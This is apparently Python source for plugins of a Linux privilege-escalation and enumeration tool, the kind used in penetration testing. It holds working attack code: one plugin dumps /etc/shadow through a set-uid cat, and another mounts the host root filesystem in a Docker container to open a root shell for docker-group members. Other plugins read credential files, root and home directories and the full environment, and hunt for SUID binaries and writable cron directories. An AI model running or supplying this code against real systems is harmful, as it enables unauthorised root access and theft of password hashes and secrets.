from plugins import PrivEsc, Enumeration
from os import popen
import os, tempfile
from subprocess import Popen, PIPE
import pty
import subprocess
import pathlib, stat
# A very basic method, but useful
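def shellRun(command):
    """Write *command* into a fresh, user-executable temp file and tell the operator how to run it.

    The command is NOT executed here: the spawn/unlink calls are left disabled
    exactly as in the original, so this only stages a script and prints its path.

    Args:
        command: Shell text to store in the script file (written as UTF-8 bytes).

    Returns:
        Path of the created file so the caller can run it and clean it up.
        NamedTemporaryFile creates it mode 0600, so only the current user can
        read or modify the staged command before it is run. The file is
        deliberately not deleted here (delete=False); the caller owns cleanup.
    """
    with tempfile.NamedTemporaryFile(delete=False) as f:
        fname = f.name
        f.write(command.encode())
    # Set the user-execute bit in-process instead of shelling out to chmod;
    # no string is handed to a shell at all.
    os.chmod(fname, stat.S_IMODE(os.stat(fname).st_mode) | stat.S_IXUSR)
    print(f"Execute command with '{fname}'...\nCtrl-D to leave shell")
    #pty.spawn("/bin/bash")
    #os.system(fname)
    #os.unlink(fname)
    return fname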
"""An example plugin that tries to use `sudo su` to get root.
Requires being given the password for the current user and relies
on the current user having sudo privs, so while technically it
escalates privileges, it does so only if you already have the
right credentials
"""
#shellRun("sudo passwd")
#shellRun("sudo id")
#shellRun("sudo -l")
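def GrabOutput(command):
    """Run *command* (an argv list, no shell) and return its stdout as text.

    Args:
        command: Argument vector passed straight to subprocess.run. Because no
            shell is involved, spaces and metacharacters in arguments are
            never re-parsed, so nothing can be injected through them.

    Returns:
        Captured stdout decoded as UTF-8. Undecodable bytes are replaced rather
        than raising, since file contents read this way are not guaranteed to
        be valid UTF-8.

    Note:
        A non-zero exit status is not raised, and stderr is left attached to
        the terminal so a failing command is still visible to the operator.
    """
    completed = subprocess.run(command, stdout=subprocess.PIPE)
    return completed.stdout.decode("utf-8", errors="replace")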
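def CheckBinary(p):
    """Report whether *p* exists and carries the set-uid bit.

    Args:
        p: Filesystem path of the binary to inspect (str or path-like).

    Returns:
        ``(exists, suid)``. ``suid`` is only meaningful when ``exists`` is
        True. ``Path.stat`` follows symlinks, so the mode of the final target
        — the file the kernel would actually execute — is what is inspected.
        A path that cannot be stat'ed at all (missing, unreadable parent,
        symlink loop) is reported as ``(False, False)`` instead of raising.

    Note:
        A set-uid bit alone does not imply a root escalation; the owner
        (``st_uid``) must also be privileged. Callers need to check that
        separately.
    """
    try:
        # One stat() instead of exists() followed by stat(): removes the
        # check-then-use window in which the path could be swapped.
        mode = pathlib.Path(p).stat().st_mode
    except OSError:
        return (False, False)
    return (True, (mode & stat.S_ISUID) != 0)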
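class linCatEscalator(PrivEsc):
    """Dump /etc/shadow through a set-uid /bin/cat, if the host is misconfigured that way.

    A set-uid-root ``cat`` reads any file as root. The check is therefore:
    does /bin/cat exist, is it set-uid, and is it owned by root — a set-uid
    bit on a non-root-owned binary only grants that owner's rights, not root's.
    """
    def __init__(self):
        # NOTE(review): unlike the Enumeration plugins in this file, the base
        # PrivEsc.__init__ is not called here; confirm PrivEsc needs no setup.
        self.name = "CatEscalator"
        self.author = "Omar Alhendi"
        self.description = "Showing Restricted file /etc/shadow using misonfigured cat"
        self.version = ""
    def execute(self):
        """Print /etc/shadow via /bin/cat when it is set-uid root; otherwise print why not."""
        catPath = "/bin/cat"
        exists, suid = CheckBinary(catPath)
        if not exists:
            print(f"{catPath} doesn't exist")
            return
        if not suid:
            print("cat doesn't have SUID bit set on")
            return
        # Set-uid only escalates to the file's owner; require root ownership
        # before claiming the read will succeed.
        if os.stat(catPath).st_uid != 0:
            print(f"{catPath} is SUID but not owned by root; it will not read /etc/shadow")
            return
        # argv list, no shell — both arguments are fixed constants.
        print(GrabOutput([catPath, "/etc/shadow"]))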
class HostInfo(Enumeration):
    """Basic host enumeration: identity, logged-in users, processes, kernel, shell environment, passwd/group, cwd listing."""
    def __init__(self):
        Enumeration.__init__(self)
        self.name = "Host Information"
        self.author = "Omar ALhendi"
        self.description = "Provides basic inforamdtion about the host"
        self.version = "2.0"
    def execute(self):
        """Run each section's commands in order, printing its heading first and a blank line between sections.

        All output goes straight to the terminal via os.system; every command
        string is a fixed constant, nothing user-controlled is interpolated.
        Note that the env/set section echoes the full shell environment, which
        may contain credentials — treat a captured report as sensitive.
        """
        os.system("hostname")
        os.system("whoami")
        sections = (
            (" Confidential And Users", (
                "id",
                "who",
                "w",
                "last",
                "cat /etc/passwd | cut -d: -f1",
                "ps aux",
                "ps -ef",
            )),
            (" Kernel Version", (
                "uname -a",
                "uname -mrs",
                "rpm -q kernel",
                "dmesg | grep Linux",
                "ls /boot | grep vmlinuz-",
            )),
            (" Environmental Variables", (
                "cat /etc/profile",
                "cat /etc/bashrc",
                "cat ~/.bash_profile",
                "cat ~/.bashrc",
                "cat ~/.bash_logout",
                "env",
                "set",
            )),
            (" Sensitive Information", (
                "cat /etc/passwd",
                "cat /etc/group",
            )),
            (" Files Privilegs", (
                "ls -la",
            )),
        )
        for index, (heading, commands) in enumerate(sections):
            if index:
                print()
            print(heading)
            for cmd in commands:
                os.system(cmd)
class NetInfo(Enumeration):
    """Network enumeration: interfaces, routes, listening sockets, services, DNS config and firewall rules."""
    def __init__(self):
        Enumeration.__init__(self)
        self.name = "Network Information"
        self.author = "Omar ALhendi"
        self.description = "Provides basic inforamtion about the network"
        self.version = "2.0"
    def execute(self):
        """Print the general network overview, then a second pass focused on live connections.

        Every command is a fixed string handed to os.system; nothing is built
        from user input. Several tools (ifconfig, netstat, chkconfig, lsof)
        may be absent on modern hosts and will simply print an error.
        """
        # NOTE(review): bare "ip" with no subcommand only prints usage; "ip a"
        # or "ip r" may have been intended — confirm before changing.
        overview = (
            "ip",
            "ifconfig",
            "netstat -p",
            "route",
            "lsof -i",
            "lsof -i :80",
            "grep 80 /etc/services",
            "netstat -antup",
            "netstat -antpx",
            "netstat -tulpn",
            "chkconfig --list",
            "chkconfig --list | grep 3:on",
            "last",
            "w",
            "cat /etc/resolv.conf",
            "cat /etc/sysconfig/network",
            "cat /etc/networks",
            "iptables -L",
        )
        connections = (
            "netstat -antup",
            "netstat -antpx",
            "netstat -tulpn",
            "chkconfig --list",
        )
        print()
        for cmd in overview:
            os.system(cmd)
        print()
        print("Other Hosts and Computers Communicating")
        for cmd in connections:
            os.system(cmd)
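class AppInfo(Enumeration):
    """Enumerate running processes, root-owned processes, and installed packages (dpkg/rpm plus package caches)."""
    def __init__(self):
        Enumeration.__init__(self)
        self.name = "Applications and Services"
        self.author = "Omar ALhendi"
        self.description = "Provides Information about The Applications And Services"
        # The other plugins in this file expose a version attribute; keep it
        # present so a loader that reads it does not fail on this one.
        self.version = ""
    def execute(self):
        """Print process listings, root processes, and installed-package inventories to the terminal.

        All command strings are fixed constants passed to os.system. The
        "| grep root" filters also match the grep process itself, so one
        extra line per listing is expected.
        """
        print()
        print("Current Services Running")
        os.system("ps aux")
        os.system("ps -ef")
        #os.system("top")
        os.system("cat /etc/services")
        print()
        print("By Root")
        os.system("ps aux | grep root")
        os.system("ps -ef | grep root")
        print()
        print("Application Installed and Running")
        os.system("dpkg -l")
        os.system("rpm -qa")
        # Was "/var/cache/apt/archivesO" (stray trailing "O"), which never matched a real path.
        os.system("ls -alh /var/cache/apt/archives/")
        os.system("ls -alh /var/cache/yum/")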
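lineBreak = "--------------------------------------"  # Visual separator printed under each result heading
results = []  # Shared placeholder for the "results" slots below; findResults() replaces it per entry

# Sensitive-file and permission checks (Ben Roxbee Cox). Each entry holds the
# shell command to run, the heading printed above its output, and a "results"
# slot that findResults() fills in.
# SECURITY NOTE: findResults() executes "cmd" with shell=True. These strings
# must stay hard-coded constants; never build them from user or remote input.
linSensitiveFiles = {
    "GROUP": {"cmd": "cat /etc/group", "msg": "Can You Read The Groups File?", "results": results},
    "SHADOW": {"cmd": "cat /etc/shadow", "msg": "Can You Read The Shadow File?", "results": results},
    "MAIL": {"cmd": "ls -alh /var/mail/", "msg": "Any Mail?", "results": results},
    "ROOTDIR": {"cmd": "ls -al /root/", "msg": "Can you read the root directory?", "results": results},
    "HOMEDIR": {"cmd": "ls -al /home/", "msg": "Any interesting files in the home directory?", "results": results},
    # "results" slot was missing here, so showResults() on an unpopulated dict raised KeyError.
    "SGID": {"cmd": "find / -perm -g=s -type f 2>/dev/null", "msg": "Any useful SGID Files?", "results": results},
    "SUID": {"cmd": "find / -perm -u=s -type f 2>/dev/null", "msg": "Any useful SUID Files?", "results": results},
    # Raw string: "\(" is not a valid Python escape and only survived by accident.
    # NOTE(review): the heading says "Files" but -type d lists directories, and
    # "-perm -o w" is not the usual find(1) spelling ("-perm -o=w") — confirm
    # this expression actually runs before relying on its output.
    "WRLDWX": {"cmd": r"find / \( -perm -o w -perm -o x \) -type d 2>/dev/null", "msg": "World Writable & Executable Files", "results": results},
}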
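def findResults(eCommands):
    """Run each entry's "cmd" and store its stdout lines under that entry's "results".

    Each "cmd" is a shell command string executed with ``shell=True``. The
    strings in this file are hard-coded constants; no untrusted input may
    ever be placed in them. stderr is captured and discarded so the report
    stays clean (find/ls noise on unreadable paths).

    Args:
        eCommands: Dict of ``{key: {"cmd": str, "msg": str, ...}}``.

    Returns:
        The same dict, mutated in place, with "results" set to the list of
        stdout lines (line endings kept) for each entry. Splitting on lines
        rather than on "/" keeps paths such as /usr/bin/sudo intact.
    """
    for entry in eCommands.values():
        completed = subprocess.run(entry["cmd"], shell=True,
                                   stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        entry["results"] = completed.stdout.splitlines(keepends=True)
    return eCommands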
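def showResults(output):
    """Print each check's heading, a separator, and its collected result chunks.

    Args:
        output: Dict as returned by findResults(): each value carries a "msg"
            heading and, once populated, a "results" list of byte chunks.
            Entries whose "results" slot was never filled are printed as an
            empty section instead of raising KeyError.

    Output comes from arbitrary files and paths, so undecodable bytes are
    replaced rather than aborting the whole report.
    """
    for item in output:
        entry = output[item]
        print("\n\n" + "[+] " + entry["msg"] + "\n" + lineBreak)
        for chunk in entry.get("results", []):
            if chunk.strip() != "":
                print(chunk.decode("utf-8", errors="replace") + " ", end="")
        print("\n")
    return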
class linCronInfo(Enumeration):
    """List cron job definitions under /etc/cron* and flag cron directories writable by others."""
    def __init__(self):
        Enumeration.__init__(self)
        self.name = "Cron Jobs"
        self.author = "Ben Roxbee Cox"
        self.description = "List running Cron jobs"
    def execute(self):
        """Run both cron checks through findResults() and print them with showResults().

        Both entries start with the module-level ``results`` placeholder;
        findResults() replaces it with each command's actual output. The
        command strings are fixed constants (they go through shell=True).
        """
        cronChecks = {
            "CRON": {"cmd": "ls -p -la /etc/cron* 2>/dev/null",
                     "msg": "Scheduled cron jobs", "results": results},
            # awk keeps lines whose mode field has "w" in the second-to-last
            # position, i.e. entries writable by "other".
            "CRONW": {"cmd": "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null",
                      "msg": "Writable cron dirs", "results": results},
        }
        showResults(findResults(cronChecks))
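class docker(PrivEsc):
    """Root shell via docker-group membership.

    Members of the ``docker`` group can drive the Docker daemon, which runs
    as root; bind-mounting the host root filesystem into a container and
    chroot-ing into it therefore yields a root shell on the host. That is
    documented Docker behaviour (docker group is root-equivalent), not a
    bug in a particular version, so the only precondition checked is group
    membership.
    """
    def __init__(self):
        self.name = "Exploit Docker"
        self.author = "Ben Roxbee Cox"
        self.description = "Exploits a known vulnerability if a user is in the Docker group"
        self.version = ""
    def execute(self):
        """Spawn the host-root shell when the current user is in the docker group; otherwise do nothing."""
        # `id -Gn` prints only group names; match whole tokens so a group such
        # as "dockerbuild", or a user name containing "docker", does not trigger
        # (the previous substring test on full `id` output did).
        groups = popen("id -Gn").read().split()
        if "docker" in groups:
            # Interactive (-it) so the chroot shell is usable; needs a local
            # alpine image or network access to pull one.
            os.system("docker run -it -v /:/mnt alpine chroot /mnt")
        return ()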